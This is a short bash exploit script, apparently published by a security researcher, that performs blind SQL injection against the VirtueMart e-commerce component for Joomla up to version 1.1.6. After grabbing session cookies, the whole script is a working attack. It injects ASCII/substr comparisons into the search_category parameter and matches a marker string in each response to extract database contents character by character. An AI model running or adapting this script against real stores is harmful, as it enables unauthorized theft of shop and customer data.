#!/bin/bash # # VirtueMart eCommerce for JOOMLA <= 1.1.6 BLIND SQL INJECTION EXPLOIT # by Andrea Fabrizi # http://www.andreafabrizi.it #IMPORTANT: search_category must be the LAST parameter in the query string URL="http://127.0.0.1/index.php?page=shop.browse&option=com_virtuemart&Itemid=1&keyword1=hand&search_op=and&&search_limiter=anywhere&search=Search&search_category=3" #SQL query to enumerate QUERY="select database()" #String to match in the page when the query is valid (e.g. and 1=1) TXT_CONTROL="Ladder" CHARSET="a b c d e f g h i l m n o p q r s t u v z w y k j x 1 2 3 4 5 6 7 8 9 0 A B C D E F G H I L M N O P Q R S T U V Z W Y K J X . _ \! \: \/ \\ \#" echo -ne "- Getting cookies... " wget -O /dev/null --user-agent="null" --quiet --keep-session-cookies --save-cookies=/tmp/sqlcookie "$URL" if [ $? -eq 0 ]; then echo -e "OK\n- Starting enumeration...\n" else echo -e "Error!" exit 1 fi j=0 while (true); do let j=$j+1 echo -e -n "$j) "; found=0 for i in $CHARSET; do echo -n "." n=$(printf '%x' "'$i") RES=$(wget -O - --user-agent="null" --quiet --load-cookies=/tmp/sqlcookie "$URL and ASCII(substr(($QUERY),$j,1))=0x$n -- " | grep "$TXT_CONTROL") if [ "$RES" != "" ]; then echo -e " -> $i" found=1 RESULT="${RESULT}$i" break; fi; done; if [ $found -ne 1 ]; then break; fi done; echo -e "\n\n -> $RESULT\n"